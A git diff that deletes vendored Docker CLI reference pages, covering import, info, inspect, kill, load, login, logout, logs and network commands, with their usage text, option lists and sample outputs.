If you specify an individual file, you must specify the full path within -the host. To import from a remote location, specify a `URI` that begins with the -`http://` or `https://` protocol. - -The `--change` option will apply `Dockerfile` instructions to the image -that is created. -Supported `Dockerfile` instructions: -`CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR` - -## Examples - -**Import from a remote location:** - -This will create a new untagged image. - - $ docker import http://example.com/exampleimage.tgz - -**Import from a local file:** - -Import to docker via pipe and `STDIN`. - - $ cat exampleimage.tgz | docker import - exampleimagelocal:new - -Import with a commit message. - - $ cat exampleimage.tgz | docker import --message "New image imported from tarball" - exampleimagelocal:new - -Import to docker from a local archive. - - $ docker import /path/to/exampleimage.tgz - -**Import from a local directory:** - - $ sudo tar -c . | docker import - exampleimagedir - -**Import from a local directory with new configurations:** - - $ sudo tar -c . | docker import --change "ENV DEBUG true" - exampleimagedir - -Note the `sudo` in this example – you must preserve -the ownership of the files (especially root ownership) during the -archiving with tar. If you are not root (or the sudo command) when you -tar, then the ownerships might not get preserved. 
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/index.md b/vendor/github.com/docker/docker/docs/reference/commandline/index.md deleted file mode 100644 index 952fa09df1..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/index.md +++ /dev/null @@ -1,178 +0,0 @@ ---- -title: "Docker commands" -description: "Docker's CLI command description and usage" -keywords: "Docker, Docker documentation, CLI, command line" -identifier: "smn_cli_guide" ---- - - - -# The Docker commands - -This section contains reference information on using Docker's command line -client. Each command has a reference page along with samples. If you are -unfamiliar with the command line, you should start by reading about how to [Use -the Docker command line](cli.md). - -You start the Docker daemon with the command line. How you start the daemon -affects your Docker containers. For that reason you should also make sure to -read the [`dockerd`](dockerd.md) reference page. - -### Docker management commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [dockerd](dockerd.md) | Launch the Docker daemon | -| [info](info.md) | Display system-wide information | -| [inspect](inspect.md)| Return low-level information on a container or image | -| [version](version.md) | Show the Docker version information | - - -### Image commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [build](build.md) | Build an image from a Dockerfile | -| [commit](commit.md) | Create a new image from a container's changes | -| [history](history.md) | Show the history of an image | -| [images](images.md) | List images | -| [import](import.md) | Import the contents from a tarball to create a filesystem image | -| [load](load.md) | Load an image from a tar archive or STDIN | -| [rmi](rmi.md) | Remove one or more images | -| [save](save.md) | Save images 
to a tar archive | -| [tag](tag.md) | Tag an image into a repository | - -### Container commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [attach](attach.md) | Attach to a running container | -| [cp](cp.md) | Copy files/folders from a container to a HOSTDIR or to STDOUT | -| [create](create.md) | Create a new container | -| [diff](diff.md) | Inspect changes on a container's filesystem | -| [events](events.md) | Get real time events from the server | -| [exec](exec.md) | Run a command in a running container | -| [export](export.md) | Export a container's filesystem as a tar archive | -| [kill](kill.md) | Kill a running container | -| [logs](logs.md) | Fetch the logs of a container | -| [pause](pause.md) | Pause all processes within a container | -| [port](port.md) | List port mappings or a specific mapping for the container | -| [ps](ps.md) | List containers | -| [rename](rename.md) | Rename a container | -| [restart](restart.md) | Restart a running container | -| [rm](rm.md) | Remove one or more containers | -| [run](run.md) | Run a command in a new container | -| [start](start.md) | Start one or more stopped containers | -| [stats](stats.md) | Display a live stream of container(s) resource usage statistics | -| [stop](stop.md) | Stop a running container | -| [top](top.md) | Display the running processes of a container | -| [unpause](unpause.md) | Unpause all processes within a container | -| [update](update.md) | Update configuration of one or more containers | -| [wait](wait.md) | Block until a container stops, then print its exit code | - -### Hub and registry commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [login](login.md) | Register or log in to a Docker registry | -| [logout](logout.md) | Log out from a Docker registry | -| [pull](pull.md) | Pull an image or a repository from a Docker registry | -| 
[push](push.md) | Push an image or a repository to a Docker registry | -| [search](search.md) | Search the Docker Hub for images | - -### Network and connectivity commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [network connect](network_connect.md) | Connect a container to a network | -| [network create](network_create.md) | Create a new network | -| [network disconnect](network_disconnect.md) | Disconnect a container from a network | -| [network inspect](network_inspect.md) | Display information about a network | -| [network ls](network_ls.md) | Lists all the networks the Engine `daemon` knows about | -| [network rm](network_rm.md) | Removes one or more networks | - - -### Shared data volume commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [volume create](volume_create.md) | Creates a new volume where containers can consume and store data | -| [volume inspect](volume_inspect.md) | Display information about a volume | -| [volume ls](volume_ls.md) | Lists all the volumes Docker knows about | -| [volume prune](volume_prune.md) | Remove all unused volumes | -| [volume rm](volume_rm.md) | Remove one or more volumes | - - -### Swarm node commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [node promote](node_promote.md) | Promote a node that is pending a promotion to manager | -| [node demote](node_demote.md) | Demotes an existing manager so that it is no longer a manager | -| [node inspect](node_inspect.md) | Inspect a node in the swarm | -| [node update](node_update.md) | Update attributes for a node | -| [node ps](node_ps.md) | List tasks running on one or more nodes | -| [node ls](node_ls.md) | List nodes in the swarm | -| [node rm](node_rm.md) | Remove one or more nodes from the swarm | - -### Swarm swarm commands - -| Command | Description | 
-|:--------|:-------------------------------------------------------------------| -| [swarm init](swarm_init.md) | Initialize a swarm | -| [swarm join](swarm_join.md) | Join a swarm as a manager node or worker node | -| [swarm leave](swarm_leave.md) | Remove the current node from the swarm | -| [swarm update](swarm_update.md) | Update attributes of a swarm | -| [swarm join-token](swarm_join_token.md) | Display or rotate join tokens | - -### Swarm service commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [service create](service_create.md) | Create a new service | -| [service inspect](service_inspect.md) | Inspect a service | -| [service ls](service_ls.md) | List services in the swarm | -| [service rm](service_rm.md) | Remove a service from the swarm | -| [service scale](service_scale.md) | Set the number of replicas for the desired state of the service | -| [service ps](service_ps.md) | List the tasks of a service | -| [service update](service_update.md) | Update the attributes of a service | - -### Swarm secret commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [secret create](secret_create.md) | Create a secret from a file or STDIN as content | -| [secret inspect](secret_inspect.md) | Inspect the specified secret | -| [secret ls](secret_ls.md) | List secrets in the swarm | -| [secret rm](secret_rm.md) | Remove the specified secrets from the swarm | - -### Swarm stack commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [stack deploy](stack_deploy.md) | Deploy a new stack or update an existing stack | -| [stack ls](stack_ls.md) | List stacks in the swarm | -| [stack ps](stack_ps.md) | List the tasks in the stack | -| [stack rm](stack_rm.md) | Remove the stack from the swarm | -| [stack services](stack_services.md) | List the services in the stack | - 
-### Plugin commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [plugin create](plugin_create.md) | Create a plugin from a rootfs and configuration | -| [plugin disable](plugin_disable.md) | Disable a plugin | -| [plugin enable](plugin_enable.md) | Enable a plugin | -| [plugin inspect](plugin_inspect.md) | Display detailed information on a plugin | -| [plugin install](plugin_install.md) | Install a plugin | -| [plugin ls](plugin_ls.md) | List plugins | -| [plugin push](plugin_push.md) | Push a plugin to a registry | -| [plugin rm](plugin_rm.md) | Remove a plugin | -| [plugin set](plugin_set.md) | Change settings for a plugin | diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/info.md b/vendor/github.com/docker/docker/docs/reference/commandline/info.md deleted file mode 100644 index 50a084fcb2..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/info.md +++ /dev/null @@ -1,224 +0,0 @@ ---- -title: "info" -description: "The info command description and usage" -keywords: "display, docker, information" ---- - - - -# info - -```markdown -Usage: docker info [OPTIONS] - -Display system-wide information - -Options: - -f, --format string Format the output using the given Go template - --help Print usage -``` - -This command displays system wide information regarding the Docker installation. -Information displayed includes the kernel version, number of containers and images. -The number of images shown is the number of unique images. The same image tagged -under different names is counted only once. - -If a format is specified, the given template will be executed instead of the -default format. Go's [text/template](http://golang.org/pkg/text/template/) package -describes all the details of the format.
- -Depending on the storage driver in use, additional information can be shown, such -as pool name, data file, metadata file, data space used, total data space, metadata -space used, and total metadata space. - -The data file is where the images are stored and the metadata file is where the -meta data regarding those images are stored. When run for the first time Docker -allocates a certain amount of data space and meta data space from the space -available on the volume where `/var/lib/docker` is mounted. - -# Examples - -## Display Docker system information - -Here is a sample output for a daemon running on Ubuntu, using the overlay2 -storage driver and a node that is part of a 2-node swarm: - - $ docker -D info - Containers: 14 - Running: 3 - Paused: 1 - Stopped: 10 - Images: 52 - Server Version: 1.13.0 - Storage Driver: overlay2 - Backing Filesystem: extfs - Supports d_type: true - Native Overlay Diff: false - Logging Driver: json-file - Cgroup Driver: cgroupfs - Plugins: - Volume: local - Network: bridge host macvlan null overlay - Swarm: active - NodeID: rdjq45w1op418waxlairloqbm - Is Manager: true - ClusterID: te8kdyw33n36fqiz74bfjeixd - Managers: 1 - Nodes: 2 - Orchestration: - Task History Retention Limit: 5 - Raft: - Snapshot Interval: 10000 - Number of Old Snapshots to Retain: 0 - Heartbeat Tick: 1 - Election Tick: 3 - Dispatcher: - Heartbeat Period: 5 seconds - CA Configuration: - Expiry Duration: 3 months - Node Address: 172.16.66.128 172.16.66.129 - Manager Addresses: - 172.16.66.128:2477 - Runtimes: runc - Default Runtime: runc - Init Binary: docker-init - containerd version: 8517738ba4b82aff5662c97ca4627e7e4d03b531 - runc version: ac031b5bf1cc92239461125f4c1ffb760522bbf2 - init version: N/A (expected: v0.13.0) - Security Options: - apparmor - seccomp - Profile: default - Kernel Version: 4.4.0-31-generic - Operating System: Ubuntu 16.04.1 LTS - OSType: linux - Architecture: x86_64 - CPUs: 2 - Total Memory: 1.937 GiB - Name: ubuntu - ID: 
H52R:7ZR6:EIIA:76JG:ORIY:BVKF:GSFU:HNPG:B5MK:APSC:SZ3Q:N326 - Docker Root Dir: /var/lib/docker - Debug Mode (client): true - Debug Mode (server): true - File Descriptors: 30 - Goroutines: 123 - System Time: 2016-11-12T17:24:37.955404361-08:00 - EventsListeners: 0 - Http Proxy: http://test:test@proxy.example.com:8080 - Https Proxy: https://test:test@proxy.example.com:8080 - No Proxy: localhost,127.0.0.1,docker-registry.somecorporation.com - Registry: https://index.docker.io/v1/ - WARNING: No swap limit support - Labels: - storage=ssd - staging=true - Experimental: false - Insecure Registries: - 127.0.0.0/8 - Registry Mirrors: - http://192.168.1.2/ - http://registry-mirror.example.com:5000/ - Live Restore Enabled: false - -The global `-D` option tells all `docker` commands to output debug information. - -The example below shows the output for a daemon running on Red Hat Enterprise Linux, -using the devicemapper storage driver. As can be seen in the output, additional -information about the devicemapper storage driver is shown: - - $ docker info - Containers: 14 - Running: 3 - Paused: 1 - Stopped: 10 - Images: 52 - Server Version: 1.10.3 - Storage Driver: devicemapper - Pool Name: docker-202:2-25583803-pool - Pool Blocksize: 65.54 kB - Base Device Size: 10.74 GB - Backing Filesystem: xfs - Data file: /dev/loop0 - Metadata file: /dev/loop1 - Data Space Used: 1.68 GB - Data Space Total: 107.4 GB - Data Space Available: 7.548 GB - Metadata Space Used: 2.322 MB - Metadata Space Total: 2.147 GB - Metadata Space Available: 2.145 GB - Udev Sync Supported: true - Deferred Removal Enabled: false - Deferred Deletion Enabled: false - Deferred Deleted Device Count: 0 - Data loop file: /var/lib/docker/devicemapper/devicemapper/data - Metadata loop file: /var/lib/docker/devicemapper/devicemapper/metadata - Library Version: 1.02.107-RHEL7 (2015-12-01) - Execution Driver: native-0.2 - Logging Driver: json-file - Plugins: - Volume: local - Network: null host bridge - Kernel Version: 
3.10.0-327.el7.x86_64 - Operating System: Red Hat Enterprise Linux Server 7.2 (Maipo) - OSType: linux - Architecture: x86_64 - CPUs: 1 - Total Memory: 991.7 MiB - Name: ip-172-30-0-91.ec2.internal - ID: I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S - Docker Root Dir: /var/lib/docker - Debug mode (client): false - Debug mode (server): false - Username: gordontheturtle - Registry: https://index.docker.io/v1/ - Insecure registries: - myinsecurehost:5000 - 127.0.0.0/8 - -You can also specify the output format: - - $ docker info --format '{{json .}}' - {"ID":"I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S","Containers":14, ...} - -Here is a sample output for a daemon running on Windows Server 2016: - - E:\docker>docker info - Containers: 1 - Running: 0 - Paused: 0 - Stopped: 1 - Images: 17 - Server Version: 1.13.0 - Storage Driver: windowsfilter - Windows: - Logging Driver: json-file - Plugins: - Volume: local - Network: nat null overlay - Swarm: inactive - Default Isolation: process - Kernel Version: 10.0 14393 (14393.206.amd64fre.rs1_release.160912-1937) - Operating System: Windows Server 2016 Datacenter - OSType: windows - Architecture: x86_64 - CPUs: 8 - Total Memory: 3.999 GiB - Name: WIN-V0V70C0LU5P - ID: NYMS:B5VK:UMSL:FVDZ:EWB5:FKVK:LPFL:FJMQ:H6FT:BZJ6:L2TD:XH62 - Docker Root Dir: C:\control - Debug Mode (client): false - Debug Mode (server): false - Registry: https://index.docker.io/v1/ - Insecure Registries: - 127.0.0.0/8 - Registry Mirrors: - http://192.168.1.2/ - http://registry-mirror.example.com:5000/ - Live Restore Enabled: false diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md deleted file mode 100644 index 7a0c3a0871..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md +++ /dev/null @@ -1,102 +0,0 @@ ---- -title: "inspect" -description: "The inspect command description and usage" 
-keywords: "inspect, container, json" ---- - - - -# inspect - -```markdown -Usage: docker inspect [OPTIONS] NAME|ID [NAME|ID...] - -Return low-level information on Docker object(s) (e.g. container, image, volume, -network, node, service, or task) identified by name or ID - -Options: - -f, --format Format the output using the given Go template - --help Print usage - -s, --size Display total file sizes if the type is container - --type Return JSON for specified type -``` - -By default, this will render all results in a JSON array. If the container and -image have the same name, this will return container JSON for unspecified type. -If a format is specified, the given template will be executed for each result. - -Go's [text/template](http://golang.org/pkg/text/template/) package -describes all the details of the format. - -## Examples - -**Get an instance's IP address:** - -For the most part, you can pick out any field from the JSON in a fairly -straightforward manner. - - {% raw %} - $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' $INSTANCE_ID - {% endraw %} - -**Get an instance's MAC address:** - -For the most part, you can pick out any field from the JSON in a fairly -straightforward manner. 
- - {% raw %} - $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.MacAddress}}{{end}}' $INSTANCE_ID - {% endraw %} - -**Get an instance's log path:** - - {% raw %} - $ docker inspect --format='{{.LogPath}}' $INSTANCE_ID - {% endraw %} - -**Get a Task's image name:** - - {% raw %} - $ docker inspect --format='{{.Container.Spec.Image}}' $INSTANCE_ID - {% endraw %} - -**List all port bindings:** - -One can loop over arrays and maps in the results to produce simple text -output: - - {% raw %} - $ docker inspect --format='{{range $p, $conf := .NetworkSettings.Ports}} {{$p}} -> {{(index $conf 0).HostPort}} {{end}}' $INSTANCE_ID - {% endraw %} - -**Find a specific port mapping:** - -The `.Field` syntax doesn't work when the field name begins with a -number, but the template language's `index` function does. The -`.NetworkSettings.Ports` section contains a map of the internal port -mappings to a list of external address/port objects. To grab just the -numeric public port, you use `index` to find the specific port map, and -then `index` 0 contains the first object inside of that. Then we ask for -the `HostPort` field to get the public address. - - {% raw %} - $ docker inspect --format='{{(index (index .NetworkSettings.Ports "8787/tcp") 0).HostPort}}' $INSTANCE_ID - {% endraw %} - -**Get a subsection in JSON format:** - -If you request a field which is itself a structure containing other -fields, by default you get a Go-style dump of the inner values. -Docker adds a template function, `json`, which can be applied to get -results in JSON format. 
- - {% raw %} - $ docker inspect --format='{{json .Config}}' $INSTANCE_ID - {% endraw %} diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/kill.md b/vendor/github.com/docker/docker/docs/reference/commandline/kill.md deleted file mode 100644 index 32fde3d8b5..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/kill.md +++ /dev/null @@ -1,34 +0,0 @@ ---- -title: "kill" -description: "The kill command description and usage" -keywords: "container, kill, signal" ---- - - - -# kill - -```markdown -Usage: docker kill [OPTIONS] CONTAINER [CONTAINER...] - -Kill one or more running containers - -Options: - --help Print usage - -s, --signal string Signal to send to the container (default "KILL") -``` - -The main process inside the container will be sent `SIGKILL`, or any -signal specified with option `--signal`. - -> **Note:** -> `ENTRYPOINT` and `CMD` in the *shell* form run as a subcommand of `/bin/sh -c`, -> which does not pass signals. This means that the executable is not the container’s PID 1 -> and does not receive Unix signals. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/load.md b/vendor/github.com/docker/docker/docs/reference/commandline/load.md deleted file mode 100644 index 04a5bc7e56..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/load.md +++ /dev/null @@ -1,53 +0,0 @@ ---- -title: "load" -description: "The load command description and usage" -keywords: "stdin, tarred, repository" ---- - - - -# load - -```markdown -Usage: docker load [OPTIONS] - -Load an image from a tar archive or STDIN - -Options: - --help Print usage - -i, --input string Read from tar archive file, instead of STDIN. - The tarball may be compressed with gzip, bzip, or xz - -q, --quiet Suppress the load output but still outputs the imported images -``` - -Loads a tarred repository from a file or the standard input stream. -Restores both images and tags. 
- - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - $ docker load < busybox.tar.gz - # […] - Loaded image: busybox:latest - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - busybox latest 769b9341d937 7 weeks ago 2.489 MB - $ docker load --input fedora.tar - # […] - Loaded image: fedora:rawhide - # […] - Loaded image: fedora:20 - # […] - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - busybox latest 769b9341d937 7 weeks ago 2.489 MB - fedora rawhide 0d20aec6529d 7 weeks ago 387 MB - fedora 20 58394af37342 7 weeks ago 385.5 MB - fedora heisenbug 58394af37342 7 weeks ago 385.5 MB - fedora latest 58394af37342 7 weeks ago 385.5 MB diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/login.md b/vendor/github.com/docker/docker/docs/reference/commandline/login.md deleted file mode 100644 index a0f35fd4d0..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/login.md +++ /dev/null @@ -1,122 +0,0 @@ ---- -title: "login" -description: "The login command description and usage" -keywords: "registry, login, image" ---- - - - -# login - -```markdown -Usage: docker login [OPTIONS] [SERVER] - -Log in to a Docker registry. -If no server is specified, the default is defined by the daemon. - -Options: - --help Print usage - -p, --password string Password - -u, --username string Username -``` - -If you want to login to a self-hosted registry you can specify this by -adding the server name. - - example: - $ docker login localhost:8080 - - -`docker login` requires user to use `sudo` or be `root`, except when: - -1. connecting to a remote daemon, such as a `docker-machine` provisioned `docker engine`. -2. user is added to the `docker` group. This will impact the security of your system; the `docker` group is `root` equivalent. See [Docker Daemon Attack Surface](https://docs.docker.com/security/security/#docker-daemon-attack-surface) for details. 
- -You can log into any public or private repository for which you have -credentials. When you log in, the command stores encoded credentials in -`$HOME/.docker/config.json` on Linux or `%USERPROFILE%/.docker/config.json` on Windows. - -## Credentials store - -The Docker Engine can keep user credentials in an external credentials store, -such as the native keychain of the operating system. Using an external store -is more secure than storing credentials in the Docker configuration file. - -To use a credentials store, you need an external helper program to interact -with a specific keychain or external store. Docker requires the helper -program to be in the client's host `$PATH`. - -This is the list of currently available credentials helpers and where -you can download them from: - -- D-Bus Secret Service: https://github.com/docker/docker-credential-helpers/releases -- Apple macOS keychain: https://github.com/docker/docker-credential-helpers/releases -- Microsoft Windows Credential Manager: https://github.com/docker/docker-credential-helpers/releases - -### Usage - -You need to specify the credentials store in `$HOME/.docker/config.json` -to tell the docker engine to use it: - -```json -{ - "credsStore": "osxkeychain" -} -``` - -If you are currently logged in, run `docker logout` to remove -the credentials from the file and run `docker login` again. - -### Protocol - -Credential helpers can be any program or script that follows a very simple protocol. -This protocol is heavily inspired by Git, but it differs in the information shared. - -The helpers always use the first argument in the command to identify the action. -There are only three possible values for that argument: `store`, `get`, and `erase`. - -The `store` command takes a JSON payload from the standard input. That payload carries -the server address, to identify the credential, the user name, and either a password -or an identity token. 
- -```json -{ - "ServerURL": "https://index.docker.io/v1", - "Username": "david", - "Secret": "passw0rd1" -} -``` - -If the secret being stored is an identity token, the Username should be set to -``. - -The `store` command can write error messages to `STDOUT` that the docker engine -will show if there was an issue. - -The `get` command takes a string payload from the standard input. That payload carries -the server address that the docker engine needs credentials for. This is -an example of that payload: `https://index.docker.io/v1`. - -The `get` command writes a JSON payload to `STDOUT`. Docker reads the user name -and password from this payload: - -```json -{ - "Username": "david", - "Secret": "passw0rd1" -} -``` - -The `erase` command takes a string payload from `STDIN`. That payload carries -the server address that the docker engine wants to remove credentials for. This is -an example of that payload: `https://index.docker.io/v1`. - -The `erase` command can write error messages to `STDOUT` that the docker engine -will show if there was an issue. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/logout.md b/vendor/github.com/docker/docker/docs/reference/commandline/logout.md deleted file mode 100644 index 1635e2244b..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/logout.md +++ /dev/null @@ -1,30 +0,0 @@ ---- -title: "logout" -description: "The logout command description and usage" -keywords: "logout, docker, registry" ---- - - - -# logout - -```markdown -Usage: docker logout [SERVER] - -Log out from a Docker registry. -If no server is specified, the default is defined by the daemon. 
- -Options: - --help Print usage -``` - -For example: - - $ docker logout localhost:8080 diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/logs.md b/vendor/github.com/docker/docker/docs/reference/commandline/logs.md deleted file mode 100644 index 891e10b55c..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/logs.md +++ /dev/null @@ -1,66 +0,0 @@ ---- -title: "logs" -description: "The logs command description and usage" -keywords: "logs, retrieve, docker" ---- - - - -# logs - -```markdown -Usage: docker logs [OPTIONS] CONTAINER - -Fetch the logs of a container - -Options: - --details Show extra details provided to logs - -f, --follow Follow log output - --help Print usage - --since string Show logs since timestamp - --tail string Number of lines to show from the end of the logs (default "all") - -t, --timestamps Show timestamps -``` - -The `docker logs` command batch-retrieves logs present at the time of execution. - -> **Note**: this command is only functional for containers that are started with -> the `json-file` or `journald` logging driver. - -For more information about selecting and configuring logging drivers, refer to -[Configure logging drivers](https://docs.docker.com/engine/admin/logging/overview/). - -The `docker logs --follow` command will continue streaming the new output from -the container's `STDOUT` and `STDERR`. - -Passing a negative number or a non-integer to `--tail` is invalid and the -value is set to `all` in that case. - -The `docker logs --timestamps` command will add an [RFC3339Nano timestamp](https://golang.org/pkg/time/#pkg-constants) -, for example `2014-09-16T06:17:46.000000000Z`, to each -log entry. To ensure that the timestamps are aligned the -nano-second part of the timestamp will be padded with zero when necessary. - -The `docker logs --details` command will add on extra attributes, such as -environment variables and labels, provided to `--log-opt` when creating the -container. 
- -The `--since` option shows only the container logs generated after -a given date. You can specify the date as an RFC 3339 date, a UNIX -timestamp, or a Go duration string (e.g. `1m30s`, `3h`). Besides RFC3339 date -format you may also use RFC3339Nano, `2006-01-02T15:04:05`, -`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local -timezone on the client will be used if you do not provide either a `Z` or a -`+-00:00` timezone offset at the end of the timestamp. When providing Unix -timestamps enter seconds[.nanoseconds], where seconds is the number of seconds -that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap -seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a -fraction of a second no more than nine digits long. You can combine the -`--since` option with either or both of the `--follow` or `--tail` options. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/menu.md b/vendor/github.com/docker/docker/docs/reference/commandline/menu.md deleted file mode 100644 index d58afacd76..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/menu.md +++ /dev/null @@ -1,28 +0,0 @@ ---- -title: "Command line reference" -description: "Docker's CLI command description and usage" -keywords: "Docker, Docker documentation, CLI, command line" -identifier: "smn_cli" ---- - - - -# The Docker commands - -This section contains reference information on using Docker's command line -client. Each command has a reference page along with samples. If you are -unfamiliar with the command line, you should start by reading about how to -[Use the Docker command line](cli.md). - -You start the Docker daemon with the command line. How you start the daemon -affects your Docker containers. For that reason you should also make sure to -read the [`dockerd`](dockerd.md) reference page. - -For a list of Docker commands see [Command line reference guide](index.md). 
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md deleted file mode 100644 index 52459a5d5f..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md +++ /dev/null @@ -1,100 +0,0 @@ ---- -title: "network connect" -description: "The network connect command description and usage" -keywords: "network, connect, user-defined" ---- - - - -# network connect - -```markdown -Usage: docker network connect [OPTIONS] NETWORK CONTAINER - -Connect a container to a network - -Options: - --alias value Add network-scoped alias for the container (default []) - --help Print usage - --ip string IP Address - --ip6 string IPv6 Address - --link value Add link to another container (default []) - --link-local-ip value Add a link-local address for the container (default []) -``` - -Connects a container to a network. You can connect a container by name -or by ID. Once connected, the container can communicate with other containers in -the same network. - -```bash -$ docker network connect multi-host-network container1 -``` - -You can also use the `docker run --network=` option to start a container and immediately connect it to a network. - -```bash -$ docker run -itd --network=multi-host-network busybox -``` - -You can specify the IP address you want to be assigned to the container's interface. - -```bash -$ docker network connect --ip 10.10.36.122 multi-host-network container2 -``` - -You can use `--link` option to link another container with a preferred alias - -```bash -$ docker network connect --link container1:c1 multi-host-network container2 -``` - -`--alias` option can be used to resolve the container by another name in the network -being connected to. - -```bash -$ docker network connect --alias db --alias mysql multi-host-network container2 -``` -You can pause, restart, and stop containers that are connected to a network. 
-A container connects to its configured networks when it runs. - -If specified, the container's IP address(es) is reapplied when a stopped -container is restarted. If the IP address is no longer available, the container -fails to start. One way to guarantee that the IP address is available is -to specify an `--ip-range` when creating the network, and choose the static IP -address(es) from outside that range. This ensures that the IP address is not -given to another container while this container is not on the network. - -```bash -$ docker network create --subnet 172.20.0.0/16 --ip-range 172.20.240.0/20 multi-host-network -``` - -```bash -$ docker network connect --ip 172.20.128.2 multi-host-network container2 -``` - -To verify the container is connected, use the `docker network inspect` command. Use `docker network disconnect` to remove a container from the network. - -Once connected in network, containers can communicate using only another -container's IP address or name. For `overlay` networks or custom plugins that -support multi-host connectivity, containers connected to the same multi-host -network but launched from different Engines can also communicate in this way. - -You can connect a container to one or more networks. The networks need not be the same type. For example, you can connect a single container bridge and overlay networks. 
- -## Related information - -* [network inspect](network_inspect.md) -* [network create](network_create.md) -* [network disconnect](network_disconnect.md) -* [network ls](network_ls.md) -* [network rm](network_rm.md) -* [network prune](network_prune.md) -* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) -* [Work with networks](https://docs.docker.com/engine/userguide/networking/work-with-networks/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md deleted file mode 100644 index e238217d41..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md +++ /dev/null @@ -1,202 +0,0 @@ ---- -title: "network create" -description: "The network create command description and usage" -keywords: "network, create" ---- - - - -# network create - -```markdown -Usage: docker network create [OPTIONS] NETWORK - -Create a network - -Options: - --attachable Enable manual container attachment - --aux-address value Auxiliary IPv4 or IPv6 addresses used by Network - driver (default map[]) - -d, --driver string Driver to manage the Network (default "bridge") - --gateway value IPv4 or IPv6 Gateway for the master subnet (default []) - --help Print usage - --internal Restrict external access to the network - --ip-range value Allocate container ip from a sub-range (default []) - --ipam-driver string IP Address Management Driver (default "default") - --ipam-opt value Set IPAM driver specific options (default map[]) - --ipv6 Enable IPv6 networking - --label value Set metadata on a network (default []) - -o, --opt value Set driver specific options (default map[]) - --subnet value Subnet in CIDR format that represents a - network segment (default []) -``` - -Creates a new network. The `DRIVER` accepts `bridge` or `overlay` which are the -built-in network drivers. 
If you have installed a third party or your own custom -network driver you can specify that `DRIVER` here also. If you don't specify the -`--driver` option, the command automatically creates a `bridge` network for you. -When you install Docker Engine it creates a `bridge` network automatically. This -network corresponds to the `docker0` bridge that Engine has traditionally relied -on. When you launch a new container with `docker run` it automatically connects to -this bridge network. You cannot remove this default bridge network, but you can -create new ones using the `network create` command. - -```bash -$ docker network create -d bridge my-bridge-network -``` - -Bridge networks are isolated networks on a single Engine installation. If you -want to create a network that spans multiple Docker hosts each running an -Engine, you must create an `overlay` network. Unlike `bridge` networks, overlay -networks require some pre-existing conditions before you can create one. These -conditions are: - -* Access to a key-value store. Engine supports Consul, Etcd, and ZooKeeper (Distributed store) key-value stores. -* A cluster of hosts with connectivity to the key-value store. -* A properly configured Engine `daemon` on each host in the cluster. - -The `dockerd` options that support the `overlay` network are: - -* `--cluster-store` -* `--cluster-store-opt` -* `--cluster-advertise` - -To read more about these options and how to configure them, see ["*Get started -with multi-host network*"](https://docs.docker.com/engine/userguide/networking/get-started-overlay). - -While not required, it is a good idea to install Docker Swarm to -manage the cluster that makes up your network. Swarm provides sophisticated -discovery and server management tools that can assist your implementation. 
